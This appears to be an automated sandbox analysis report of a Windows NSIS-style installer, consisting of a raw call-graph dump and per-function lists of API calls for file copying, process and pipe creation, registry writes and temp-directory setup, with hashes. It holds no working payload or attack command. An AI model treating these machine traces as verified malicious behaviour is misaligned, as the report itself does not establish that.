FindFirstFileW 3473->3475 3474->3473 3474->3475 3477 4058d1 3475->3477 3496 40582d 3475->3496 3478 405935 3 API calls 3476->3478 3477->3467 3479 405900 3478->3479 3481 40572a 5 API calls 3479->3481 3480 4058b4 FindNextFileW 3484 4058ca FindClose 3480->3484 3480->3496 3483 40590c 3481->3483 3485 405910 3483->3485 3486 405926 3483->3486 3484->3477 3485->3468 3489 405194 25 API calls 3485->3489 3488 405194 25 API calls 3486->3488 3488->3468 3491 40591d 3489->3491 3490 405772 64 API calls 3490->3496 3493 405d84 40 API calls 3491->3493 3492 405194 25 API calls 3492->3480 3495 405924 3493->3495 3494 405194 25 API calls 3494->3496 3495->3468 3496->3480 3496->3490 3496->3492 3496->3494 3517 405eea lstrcpynW 3496->3517 3518 40572a 3496->3518 3526 405d84 3496->3526 3531 405eea lstrcpynW 3498->3531 3500 405a4e 3532 4059e0 CharNextW CharNextW 3500->3532 3503 405792 3503->3461 3503->3462 3504 40617e 5 API calls 3510 405a64 3504->3510 3505 405a95 lstrlenW 3506 405aa0 3505->3506 3505->3510 3508 405935 3 API calls 3506->3508 3507 40622d 2 API calls 3507->3510 3509 405aa5 GetFileAttributesW 3508->3509 3509->3503 3510->3503 3510->3505 3510->3507 3511 405981 2 API calls 3510->3511 3511->3505 3512->3464 3514 40598f 3513->3514 3515 4059a1 3514->3515 3516 405995 CharPrevW 3514->3516 3515->3470 3516->3514 3516->3515 3517->3496 3519 405b31 2 API calls 3518->3519 3520 405736 3519->3520 3521 405757 3520->3521 3522 405745 RemoveDirectoryW 3520->3522 3523 40574d DeleteFileW 3520->3523 3521->3496 3524 405753 3522->3524 3523->3524 3524->3521 3525 405763 SetFileAttributesW 3524->3525 3525->3521 3538 406254 GetModuleHandleA 3526->3538 3530 405dac 3530->3496 3531->3500 3533 4059fd 3532->3533 3535 405a0f 3532->3535 3533->3535 3536 405a0a CharNextW 3533->3536 3534 405a33 3534->3503 3534->3504 3535->3534 3537 405962 CharNextW 3535->3537 3536->3534 3537->3535 3539 406270 LoadLibraryA 3538->3539 3540 40627b GetProcAddress 3538->3540 3539->3540 3541 405d8b 3539->3541 3540->3541 3541->3530 3542 405c08 lstrcpyW 3541->3542 3543 405c31 3542->3543 3544 405c57 GetShortPathNameW 3542->3544 3567 405b56 GetFileAttributesW CreateFileW 3543->3567 3546 405c6c 3544->3546 3547 405d7e 3544->3547 3546->3547 3549 405c74 wsprintfA 3546->3549 3547->3530 3548 405c3b CloseHandle GetShortPathNameW 3548->3547 3550 405c4f 3548->3550 3551 405f0c 18 API calls 3549->3551 3550->3544 3550->3547 3552 405c9c 3551->3552 3568 405b56 GetFileAttributesW CreateFileW 3552->3568 3554 405ca9 3554->3547 3555 405cb8 GetFileSize GlobalAlloc 3554->3555 3556 405d77 CloseHandle 3555->3556 3557 405cda 3555->3557 3556->3547 3558 405bd9 ReadFile 3557->3558 3559 405ce2 3558->3559 3559->3556 3569 405abb lstrlenA 3559->3569 3562 405cf9 lstrcpyA 3565 405d1b 3562->3565 3563 405d0d 3564 405abb 4 API calls 3563->3564 3564->3565 3566 405d52 SetFilePointer WriteFile GlobalFree 3565->3566 3566->3556 3567->3548 3568->3554 3570 405afc lstrlenA 3569->3570 3571 405ad5 lstrcmpiA 3570->3571 3573 405b04 3570->3573 3572 405af3 CharNextA 3571->3572 3571->3573 3572->3570 3573->3562 3573->3563 4666 402224 4667 40222b 4666->4667 4670 40223e 4666->4670 4668 405f0c 18 API calls 4667->4668 4669 402238 4668->4669 4671 4056c6 MessageBoxIndirectW 4669->4671 4671->4670 4672 10001968 GetCommandLineW lstrcpynW 4673 100019bc 4672->4673 4674 100019dd CharNextW 4673->4674 4675 100019d2 CharNextW 4673->4675 4676 100019e2 CreateProcessW 4674->4676 4675->4673 4678 10001a10 WaitForSingleObject GetExitCodeProcess CloseHandle CloseHandle ExitProcess 4676->4678 4679 10001a41 ExitProcess 4676->4679 4680 402729 4681 402730 4680->4681 4682 4029c7 4680->4682 4683 402736 FindClose 4681->4683 4683->4682 4684 401cab 4685 402b1d 18 API calls 4684->4685 4686 401cb2 4685->4686 4687 402b1d 18 API calls 4686->4687 4688 401cba GetDlgItem 4687->4688 4689 4024e8 4688->4689 4690 4016af 4691 402b3a 18 API calls 4690->4691 4692 4016b5 GetFullPathNameW 4691->4692 4693 4016cf 4692->4693 4699 4016f1 4692->4699 4695 40622d 2 API calls 4693->4695 4693->4699 4694 401706 GetShortPathNameW 4696 4029c7 4694->4696 4697 4016e1 4695->4697 4697->4699 4700 405eea lstrcpynW 4697->4700 4699->4694 4699->4696 4700->4699 3162 402331 3163 402337 3162->3163 3179 402b3a 3163->3179 3166 402b3a 18 API calls 3167 402353 RegCreateKeyExW 3166->3167 3168 40237d 3167->3168 3169 402793 3167->3169 3170 402b3a 18 API calls 3168->3170 3172 402398 3168->3172 3173 40238e lstrlenW 3170->3173 3171 4023a4 3175 4023bf RegSetValueExW 3171->3175 3185 403062 3171->3185 3172->3171 3200 402b1d 3172->3200 3173->3172 3176 4023d5 RegCloseKey 3175->3176 3176->3169 3180 402b46 3179->3180 3203 405f0c 3180->3203 3182 402349 3182->3166 3186 403072 SetFilePointer 3185->3186 3187 40308e 3185->3187 3186->3187 3242 40317d GetTickCount 3187->3242 3192 40317d 43 API calls 3193 4030c5 3192->3193 3194 40313f ReadFile 3193->3194 3197 4030d5 3193->3197 3199 403139 3193->3199 3194->3199 3196 405bd9 ReadFile 3196->3197 3197->3196 3198 403108 WriteFile 3197->3198 3197->3199 3198->3197 3198->3199 3199->3175 3201 405f0c 18 API calls 3200->3201 3202 402b31 3201->3202 3202->3171 3209 405f19 3203->3209 3204 406164 3205 402b67 3204->3205 3237 405eea lstrcpynW 3204->3237 3205->3182 3221 40617e 3205->3221 3207 405fcc GetVersion 3207->3209 3208 406132 lstrlenW 3208->3209 3209->3204 3209->3207 3209->3208 3210 405f0c 10 API calls 3209->3210 3214 406047 GetSystemDirectoryW 3209->3214 3215 40605a GetWindowsDirectoryW 3209->3215 3216 40617e 5 API calls 3209->3216 3217 405f0c 10 API calls 3209->3217 3218 4060d3 lstrcatW 3209->3218 3219 40608e SHGetSpecialFolderLocation 3209->3219 3230 405db7 RegOpenKeyExW 3209->3230 3235 405e31 wsprintfW 3209->3235 3236 405eea lstrcpynW 3209->3236 3210->3208 3214->3209 3215->3209 3216->3209 3217->3209 3218->3209 3219->3209 3220 4060a6 SHGetPathFromIDListW CoTaskMemFree 3219->3220 3220->3209 3228 40618b 3221->3228 3222 406201 3223 406206 CharPrevW 3222->3223 3225 406227 3222->3225 3223->3222 3224 4061f4 CharNextW 3224->3222 3224->3228 3225->3182 3227 4061e0 CharNextW 3227->3228 3228->3222 3228->3224 3228->3227 3229 4061ef CharNextW 3228->3229 3238 405962 3228->3238 3229->3224 3231 405e2b 3230->3231 3232 405deb RegQueryValueExW 3230->3232 3231->3209 3233 405e0c RegCloseKey 3232->3233 3233->3231 3235->3209 3236->3209 3237->3205 3239 405968 3238->3239 3240 40597e 3239->3240 3241 40596f CharNextW 3239->3241 3240->3228 3241->3239 3243 4032e7 3242->3243 3244 4031ac 3242->3244 3245 402d1a 33 API calls 3243->3245 3257 40330f SetFilePointer 3244->3257 3251 403095 3245->3251 3247 4031b7 SetFilePointer 3253 4031dc 3247->3253 3251->3199 3255 405bd9 ReadFile 3251->3255 3252 403271 WriteFile 3252->3251 3252->3253 3253->3251 3253->3252 3254 4032c8 SetFilePointer 3253->3254 3258 4032f9 3253->3258 3261 406390 3253->3261 3268 402d1a 3253->3268 3254->3243 3256 4030ae 3255->3256 3256->3192 3256->3199 3257->3247 3259 405bd9 ReadFile 3258->3259 3260 40330c 3259->3260 3260->3253 3262 4063b5 3261->3262 3263 4063bd 3261->3263 3262->3253 3263->3262 3264 406444 GlobalFree 3263->3264 3265 40644d GlobalAlloc 3263->3265 3266 4064c4 GlobalAlloc 3263->3266 3267 4064bb GlobalFree 3263->3267 3264->3265 3265->3262 3265->3263 3266->3262 3266->3263 3267->3266 3269 402d43 3268->3269 3270 402d2b 3268->3270 3273 402d53 GetTickCount 3269->3273 3274 402d4b 3269->3274 3271 402d34 DestroyWindow 3270->3271 3272 402d3b 3270->3272 3271->3272 3272->3253 3273->3272 3276 402d61 3273->3276 3283 40628d 3274->3283 3277 402d96 CreateDialogParamW ShowWindow 3276->3277 3278 402d69 3276->3278 3277->3272 3278->3272 3287 402cfe 3278->3287 3280 402d77 wsprintfW 3290 405194 3280->3290 3284 4062aa PeekMessageW 3283->3284 3285 4062a0 DispatchMessageW 3284->3285 3286 4062ba 3284->3286 3285->3284 3286->3272 3288 402d0d 3287->3288 3289 402d0f MulDiv 3287->3289 3288->3289 3289->3280 3291 402d94 3290->3291 3292 4051af 3290->3292 3291->3272 3293 4051cb lstrlenW 3292->3293 3294 405f0c 18 API calls 3292->3294 3295 4051f4 3293->3295 3296 4051d9 lstrlenW 3293->3296 3294->3293 3297 405207 3295->3297 3298 4051fa SetWindowTextW 3295->3298 3296->3291 3299 4051eb lstrcatW 3296->3299 3297->3291 3300 40520d SendMessageW SendMessageW SendMessageW 3297->3300 3298->3297 3299->3295 3300->3291 4701 406c32 4704 4063c3 4701->4704 4702 406444 GlobalFree 4703 40644d GlobalAlloc 4702->4703 4703->4704 4705 406d2e 4703->4705 4704->4702 4704->4703 4704->4704 4704->4705 4706 4064c4 GlobalAlloc 4704->4706 4707 4064bb GlobalFree 4704->4707 4706->4704 4706->4705 4707->4706 4708 4027b5 4709 402b3a 18 API calls 4708->4709 4710 4027c3 4709->4710 4711 4027d9 4710->4711 4712 402b3a 18 API calls 4710->4712 4713 405b31 2 API calls 4711->4713 4712->4711 4714 4027df 4713->4714 4734 405b56 GetFileAttributesW CreateFileW 4714->4734 4716 4027ec 4717 402895 4716->4717 4718 4027f8 GlobalAlloc 4716->4718 4721 4028b0 4717->4721 4722 40289d DeleteFileW 4717->4722 4719 402811 4718->4719 4720 40288c CloseHandle 4718->4720 4735 40330f SetFilePointer 4719->4735 4720->4717 4722->4721 4724 402817 4725 4032f9 ReadFile 4724->4725 4726 402820 GlobalAlloc 4725->4726 4727 402830 4726->4727 4728 402864 WriteFile GlobalFree 4726->4728 4730 403062 46 API calls 4727->4730 4729 403062 46 API calls 4728->4729 4731 402889 4729->4731 4733 40283d 4730->4733 4731->4720 4732 40285b GlobalFree 4732->4728 4733->4732 4734->4716 4735->4724 4736 4028b6 4737 402b1d 18 API calls 4736->4737 4738 4028bc 4737->4738 4739 4028f8 4738->4739 4740 4028df 4738->4740 4746 402793 4738->4746 4741 402902 4739->4741 4742 40290e 4739->4742 4743 4028e4 4740->4743 4749 4028f5 4740->4749 4744 402b1d 18 API calls 4741->4744 4745 405f0c 18 API calls 4742->4745 4750 405eea lstrcpynW 4743->4750 4744->4749 4745->4749 4749->4746 4751 405e31 wsprintfW 4749->4751 4750->4746 4751->4746 4752 4014b8 4753 4014be 4752->4753 4754 401389 2 API calls 4753->4754 4755 4014c6 4754->4755 3699 4015b9 3700 402b3a 18 API calls 3699->3700 3701 4015c0 3700->3701 3702 4059e0 4 API calls 3701->3702 3712 4015c9 3702->3712 3703 401614 3705 401646 3703->3705 3706 401619 3703->3706 3704 405962 CharNextW 3707 4015d7 CreateDirectoryW 3704->3707 3710 401423 25 API calls 3705->3710 3708 401423 25 API calls 3706->3708 3709 4015ed GetLastError 3707->3709 3707->3712 3711 401620 3708->3711 3709->3712 3713 4015fa GetFileAttributesW 3709->3713 3715 40163e 3710->3715 3717 405eea lstrcpynW 3711->3717 3712->3703 3712->3704 3713->3712 3716 40162d SetCurrentDirectoryW 3716->3715 3717->3716 4756 401939 4757 402b3a 18 API calls 4756->4757 4758 401940 lstrlenW 4757->4758 4759 4024e8 4758->4759 4760 40293b 4761 402b1d 18 API calls 4760->4761 4762 402941 4761->4762 4763 402974 4762->4763 4764 402793 4762->4764 4766 40294f 4762->4766 4763->4764 4765 405f0c 18 API calls 4763->4765 4765->4764 4766->4764 4768 405e31 wsprintfW 4766->4768 4768->4764 4032 40173f 4033 402b3a 18 API calls 4032->4033 4034 401746 4033->4034 4035 405b85 2 API calls 4034->4035 4036 40174d 4035->4036 4037 405b85 2 API calls 4036->4037 4037->4036 4769 40653f 4773 4063c3 4769->4773 4770 406d2e 4771 406444 GlobalFree 4772 40644d GlobalAlloc 4771->4772 4772->4770 4772->4773 4773->4770 4773->4771 4773->4772 4774 4064c4 GlobalAlloc 4773->4774 4775 4064bb GlobalFree 4773->4775 4774->4770 4774->4773 4775->4774

                                                                        Executed Functions

                                                                        Function 10001112 Relevance: 126.6, APIs: 65, Strings: 7, Instructions: 586stringfilememoryCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 0 10001112-10001141 call 10001096 3 10001147-1000118b GetModuleFileNameW GlobalAlloc 0->3 4 1000128c-100012a8 GlobalAlloc 0->4 5 1000118e-10001192 3->5 6 100012aa-100012c0 4->6 7 10001194-100011ac CharPrevW 5->7 8 100011ae-100011b6 5->8 9 100012c2-100012de FindWindowExW * 2 6->9 10 100012e3-100012f8 call 10001a4c call 10001862 6->10 7->5 7->8 12 100011b8-100011bd call 10001a8c 8->12 13 100011ce-10001201 GetTempFileNameW CopyFileW 8->13 9->10 24 10001309-10001317 lstrcmpiW 10->24 25 100012fa-10001307 call 100018c8 10->25 19 100011c2-100011c9 GlobalFree 12->19 16 10001203-10001237 CreateFileW CreateFileMappingW MapViewOfFile 13->16 17 1000126d-1000128a lstrcatW lstrlenW 13->17 20 10001239-10001259 UnmapViewOfFile 16->20 21 1000125f-1000126b CloseHandle * 2 16->21 17->6 23 100017f1-100017f5 19->23 20->21 21->17 27 10001325-10001328 24->27 28 10001319 24->28 30 10001320-10001323 25->30 31 10001356-100013cd 27->31 32 1000132a-10001339 call 10001a8c 27->32 28->30 30->10 33 10001401-10001415 GetVersionExW 31->33 34 100013cf-100013d3 31->34 43 1000133b 32->43 44 1000133f-10001342 32->44 38 10001437 33->38 39 10001417-10001435 InitializeSecurityDescriptor SetSecurityDescriptorDacl 33->39 36 100013d5-100013dc 34->36 37 100013de 34->37 41 100013e3-100013f1 GlobalAlloc 36->41 37->41 42 1000143a-10001452 CreatePipe 38->42 39->42 46 10001711-1000171d lstrcpyW 41->46 47 100013f7-100013fe GlobalLock 41->47 42->46 48 10001458-1000146d CreatePipe 42->48 43->44 44->19 45 10001348-10001351 DeleteFileW 44->45 45->19 49 10001723-10001727 46->49 47->33 48->46 50 10001473-100014b9 GetStartupInfoW CreateProcessW 48->50 51 10001731-10001735 49->51 52 10001729-1000172c call 10001a8c 49->52 50->46 53 100014bf-100014c5 GetTickCount 50->53 56 10001737-1000173d 51->56 57 1000174a-10001751 51->57 52->51 55 100014c8-100014d0 53->55 61 100014d2-100014d5 55->61 62 100014db-100014ef PeekNamedPipe 55->62 56->57 58 1000173f-10001749 call 100017f6 56->58 59 10001753-1000175f lstrcpyW 57->59 60 10001765-1000176c 57->60 58->57 59->60 66 10001786-100017bf call 10001a8c CloseHandle * 6 60->66 67 1000176e-10001783 wsprintfW 60->67 61->49 61->62 64 100016a4-100016a9 62->64 65 100014f5-10001533 GetTickCount ReadFile call 100010d3 62->65 70 100016d9-100016db Sleep 64->70 71 100016ab-100016b8 GetTickCount 64->71 75 100016e1-1000170c WaitForSingleObject GetExitCodeProcess PeekNamedPipe 65->75 77 10001539-10001548 lstrlenW 65->77 78 100017c1 66->78 79 100017c5-100017c8 66->79 67->66 70->75 71->70 74 100016ba-100016d7 TerminateProcess lstrcpyW 71->74 74->75 75->55 80 10001569-10001584 lstrlenW GlobalSize 77->80 81 1000154a-10001564 lstrlenW lstrcpynW 77->81 78->79 82 100017d3-100017e1 GlobalFree 79->82 83 100017ca-100017cd DeleteFileW 79->83 84 10001586-100015a7 GlobalUnlock GlobalReAlloc 80->84 85 100015b7-100015c9 lstrcatW 80->85 81->75 82->23 86 100017e3-100017ef GlobalUnlock GlobalFree 82->86 83->82 84->46 87 100015ad-100015b4 GlobalLock 84->87 88 10001626-10001631 call 10001862 85->88 86->23 87->85 91 10001633-1000163b 88->91 92 100015cb-100015e2 GlobalSize 88->92 91->75 93 10001641-10001648 91->93 94 100015e4-100015eb 92->94 95 100015ed-100015fd lstrlenW 92->95 96 10001651-10001655 93->96 97 1000164a-1000164f 93->97 98 10001620-10001625 94->98 99 1000160c-1000161b lstrcpyW 95->99 100 100015ff-1000160a 95->100 102 10001657-1000165a 96->102 103 10001678-1000167f CharNextW 96->103 101 10001681-10001684 97->101 98->88 99->98 100->99 100->100 101->93 104 10001686-10001689 101->104 105 10001662-10001665 102->105 103->101 104->75 106 1000168b-1000168e 104->106 107 10001667-10001676 call 100017f6 105->107 108 1000165c-1000165e 105->108 109 10001697-1000169d 106->109 107->101 108->107 110 10001660-10001661 108->110 112 10001690-10001696 109->112 113 1000169f-100016a2 109->113 110->105 112->109 113->75
                                                                        APIs
                                                                          • Part of subcall function 10001096: GetModuleHandleW.KERNEL32(kernel32,IsWow64Process,?,0000003F,?,1000113F), ref: 100010A5
                                                                          • Part of subcall function 10001096: GetProcAddress.KERNEL32(00000000), ref: 100010AC
                                                                          • Part of subcall function 10001096: GetCurrentProcess.KERNEL32(?,?,0000003F,?,1000113F), ref: 100010BC
                                                                        • GetModuleFileNameW.KERNEL32(?,00000104), ref: 10001159
                                                                        • GlobalAlloc.KERNEL32(00000040,?), ref: 10001171
                                                                        • CharPrevW.USER32(?,?), ref: 1000119C
                                                                        • GlobalFree.KERNEL32(00000000), ref: 100011C3
                                                                        • GetTempFileNameW.KERNEL32(?,100030A4,00000000,?), ref: 100011E3
                                                                        • CopyFileW.KERNEL32(?,?,00000000), ref: 100011F9
                                                                        • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,00000000,00000000), ref: 10001211
                                                                        • CreateFileMappingW.KERNEL32(00000000,00000000,00000004,00000000,00000000,00000000), ref: 10001221
                                                                        • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000), ref: 1000122F
                                                                        • UnmapViewOfFile.KERNEL32(00000000), ref: 10001259
                                                                        • CloseHandle.KERNEL32(00000000), ref: 10001266
                                                                        • CloseHandle.KERNEL32(?), ref: 1000126B
                                                                        • lstrcatW.KERNEL32(00000000,100030A0), ref: 10001273
                                                                        • lstrlenW.KERNEL32(00000000), ref: 1000127A
                                                                        • GlobalAlloc.KERNEL32(00000040,?), ref: 1000129D
                                                                        • FindWindowExW.USER32(00010460,00000000,#32770,00000000), ref: 100012D1
                                                                        • FindWindowExW.USER32(00000000), ref: 100012D8
                                                                        • lstrcmpiW.KERNEL32(00000000,/OEM,00000000), ref: 1000130F
                                                                        • DeleteFileW.KERNEL32(?,error), ref: 1000134B
                                                                        • GlobalAlloc.KERNEL32(00000042,00002000), ref: 100013E6
                                                                        • GlobalLock.KERNEL32(00000000), ref: 100013F8
                                                                        • GetVersionExW.KERNEL32(00000114), ref: 10001408
                                                                        • InitializeSecurityDescriptor.ADVAPI32(?,00000001), ref: 1000141C
                                                                        • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,00000000,00000000), ref: 10001429
                                                                        • CreatePipe.KERNELBASE(?,?,0000000C,00000000), ref: 1000144A
                                                                        • CreatePipe.KERNELBASE(?,?,0000000C,00000000), ref: 10001465
                                                                        • GetStartupInfoW.KERNEL32(?), ref: 1000147A
                                                                        • CreateProcessW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,00000010,00000000,00000000,?,?), ref: 100014B1
                                                                        • GetTickCount.KERNEL32 ref: 100014BF
                                                                        • PeekNamedPipe.KERNELBASE(?,00000000,00000000,00000000,?,00000000), ref: 100014E6
                                                                        • GetTickCount.KERNEL32 ref: 100014F5
                                                                        • ReadFile.KERNEL32(?,100030B8,000003FF,?,00000000), ref: 10001511
                                                                        • lstrlenW.KERNEL32(?), ref: 10001542
                                                                        • lstrlenW.KERNEL32(?,100034B8,00000400), ref: 10001558
                                                                        • lstrcpynW.KERNEL32(00000000), ref: 1000155E
                                                                        • lstrlenW.KERNEL32(100034B8), ref: 1000156D
                                                                        • GlobalSize.KERNEL32(00000002), ref: 10001579
                                                                        • GlobalUnlock.KERNEL32(00000002), ref: 10001589
                                                                        • GlobalReAlloc.KERNEL32(00000002,00000903,00000042), ref: 1000159C
                                                                        • GlobalLock.KERNEL32(00000000), ref: 100015AE
                                                                        • lstrcatW.KERNEL32(?,100034B8), ref: 100015BB
                                                                        • GlobalSize.KERNEL32(00000002), ref: 100015CE
                                                                        • lstrlenW.KERNEL32(00000000), ref: 100015EE
                                                                        • lstrcpyW.KERNEL32(00000000, ), ref: 10001612
                                                                        • CharNextW.USER32(?), ref: 10001679
                                                                        • GetTickCount.KERNEL32 ref: 100016AB
                                                                        • TerminateProcess.KERNEL32(?,000000FF), ref: 100016BF
                                                                        • lstrcpyW.KERNEL32(?,timeout), ref: 100016D1
                                                                        • Sleep.KERNELBASE(00000064), ref: 100016DB
                                                                        • WaitForSingleObject.KERNEL32(?,00000000), ref: 100016E5
                                                                        • GetExitCodeProcess.KERNELBASE(?,?), ref: 100016F5
                                                                        • PeekNamedPipe.KERNELBASE(?,00000000,00000000,00000000,?,00000000), ref: 10001706
                                                                        • lstrcpyW.KERNEL32(?,error), ref: 1000171D
                                                                        • lstrcpyW.KERNEL32(?,error), ref: 1000175F
                                                                        • wsprintfW.USER32 ref: 1000177D
                                                                        • CloseHandle.KERNEL32(?,?), ref: 1000179B
                                                                        • CloseHandle.KERNEL32(?), ref: 100017A0
                                                                        • CloseHandle.KERNEL32(?), ref: 100017A5
                                                                        • CloseHandle.KERNEL32(?), ref: 100017AA
                                                                        • CloseHandle.KERNEL32(?), ref: 100017AF
                                                                        • CloseHandle.KERNEL32(?), ref: 100017B4
                                                                        • DeleteFileW.KERNEL32(?), ref: 100017CD
                                                                        • GlobalFree.KERNEL32(?), ref: 100017DC
                                                                        • GlobalUnlock.KERNEL32(00000001), ref: 100017E6
                                                                        • GlobalFree.KERNEL32(00000001), ref: 100017EF
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1651374950.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000000.00000002.1651352139.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1651814942.0000000010002000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1651860547.0000000010003000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1651876338.0000000010004000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_10000000_160420241245287.jbxd
                                                                        Similarity
                                                                        • API ID: Global$File$Handle$Close$Createlstrlen$AllocPipeProcesslstrcpy$CountFreeTick$CharDeleteDescriptorFindLockModuleNameNamedPeekSecuritySizeUnlockViewWindowlstrcat$AddressCodeCopyCurrentDaclExitInfoInitializeMappingNextObjectPrevProcReadSingleSleepStartupTempTerminateUnmapVersionWaitlstrcmpilstrcpynwsprintf
                                                                        • String ID: $#32770$/OEM$/TIMEOUT=$SysListView32$error$timeout
                                                                        • API String ID: 4049317599-620579739
                                                                        • Opcode ID: 2eaa6d1bbf70ee58a3964e22a8506e291c69bc0a864cc5f426cb649f96b96720
                                                                        • Instruction ID: 5c68747c54cc819f90348a5b8123bd73389b7655e45d881dfec801426264fe78
                                                                        • Opcode Fuzzy Hash: 2eaa6d1bbf70ee58a3964e22a8506e291c69bc0a864cc5f426cb649f96b96720
                                                                        • Instruction Fuzzy Hash: 32221971900219EFFB11DFA4CC88AEEBBB9FF483C4F51406AE605A6169DB305E45CB61
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0040335A Relevance: 75.6, APIs: 27, Strings: 16, Instructions: 335stringfilecomCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 115 40335a-4033f0 #17 SetErrorMode OleInitialize call 406254 SHGetFileInfoW call 405eea GetCommandLineW call 405eea GetModuleHandleW 122 4033f2-4033f9 115->122 123 4033fa-40340c call 405962 CharNextW 115->123 122->123 126 4034da-4034e0 123->126 127 403411-403417 126->127 128 4034e6 126->128 130 403420-403426 127->130 131 403419-40341e 127->131 129 4034fa-403514 GetTempPathW call 403326 128->129 140 403516-403534 GetWindowsDirectoryW lstrcatW call 403326 129->140 141 40356c-403586 DeleteFileW call 402dbc 129->141 133 403428-40342c 130->133 134 40342d-403431 130->134 131->130 131->131 133->134 136 403437-40343d 134->136 137 4034cb-4034d6 call 405962 134->137 138 403457-40346e 136->138 139 40343f-403446 136->139 137->126 154 4034d8-4034d9 137->154 145 403470-403486 138->145 146 40349c-4034b2 138->146 143 403448-40344b 139->143 144 40344d 139->144 140->141 157 403536-403566 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 403326 140->157 159 40361c-40362b call 4037c2 OleUninitialize 141->159 160 40358c-403592 141->160 143->138 143->144 144->138 145->146 150 403488-403490 145->150 146->137 152 4034b4-4034c9 146->152 155 403492-403495 150->155 156 403497 150->156 152->137 158 4034e8-4034f5 call 405eea 152->158 154->126 155->146 155->156 156->146 157->141 157->159 158->129 172 403631-403641 call 4056c6 ExitProcess 159->172 173 403727-40372d 159->173 164 403594-40359f call 405962 160->164 165 40360c-403613 call 4038b4 160->165 176 4035a1-4035b2 164->176 177 4035d6-4035e0 164->177 171 403618 165->171 171->159 174 4037aa-4037b2 173->174 175 40372f-40374c call 406254 * 3 173->175 181 4037b4 174->181 182 4037b8-4037bc ExitProcess 174->182 206 403796-4037a1 ExitWindowsEx 175->206 207 40374e-403750 175->207 180 4035b4-4035b6 176->180 183 4035e2-4035f0 call 405a3d 177->183 184 403647-403661 lstrcatW lstrcmpiW 177->184 187 4035d0-4035d4 180->187 188 4035b8-4035ce 180->188 181->182 183->159 196 4035f2-403608 call 405eea * 2 183->196 184->159 190 403663-403679 CreateDirectoryW SetCurrentDirectoryW 184->190 187->177 187->180 188->177 188->187 193 403686-4036af call 405eea 190->193 194 40367b-403681 call 405eea 190->194 204 4036b4-4036d0 call 405f0c DeleteFileW 193->204 194->193 196->165 213 403711-403719 204->213 214 4036d2-4036e2 CopyFileW 204->214 206->174 210 4037a3-4037a5 call 40140b 206->210 207->206 211 403752-403754 207->211 210->174 211->206 216 403756-403768 GetCurrentProcess 211->216 213->204 218 40371b-403722 call 405d84 213->218 214->213 217 4036e4-403704 call 405d84 call 405f0c call 405665 214->217 216->206 223 40376a-40378c 216->223 217->213 230 403706-40370d CloseHandle 217->230 218->159 223->206 230->213
                                                                        APIs
                                                                        • #17.COMCTL32 ref: 00403379
                                                                        • SetErrorMode.KERNELBASE(00008001), ref: 00403384
                                                                        • OleInitialize.OLE32(00000000), ref: 0040338B
                                                                          • Part of subcall function 00406254: GetModuleHandleA.KERNEL32(?,?,00000020,0040339D,00000008), ref: 00406266
                                                                          • Part of subcall function 00406254: LoadLibraryA.KERNELBASE(?,?,00000020,0040339D,00000008), ref: 00406271
                                                                          • Part of subcall function 00406254: GetProcAddress.KERNEL32(00000000,?), ref: 00406282
                                                                        • SHGetFileInfoW.SHELL32(00420690,00000000,?,000002B4,00000000), ref: 004033B3
                                                                          • Part of subcall function 00405EEA: lstrcpynW.KERNEL32(?,?,00000400,004033C8,004281E0,NSIS Error), ref: 00405EF7
                                                                        • GetCommandLineW.KERNEL32(004281E0,NSIS Error), ref: 004033C8
                                                                        • GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\160420241245287.exe",00000000), ref: 004033DB
                                                                        • CharNextW.USER32(00000000,"C:\Users\user\Desktop\160420241245287.exe",00000020), ref: 00403402
                                                                        • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 0040350B
                                                                        • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 0040351C
                                                                        • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403528
                                                                        • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040353C
                                                                        • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 00403544
                                                                        • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 00403555
                                                                        • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 0040355D
                                                                        • DeleteFileW.KERNELBASE(1033), ref: 00403571
                                                                        • OleUninitialize.OLE32(?), ref: 00403621
                                                                        • ExitProcess.KERNEL32 ref: 00403641
                                                                        • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu.tmp), ref: 0040364D
                                                                        • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\160420241245287.exe",00000000,?), ref: 00403659
                                                                        • CreateDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,00000000), ref: 00403665
                                                                        • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\), ref: 0040366C
                                                                        • DeleteFileW.KERNEL32(0041FE90,0041FE90,?,0042A000,?), ref: 004036C6
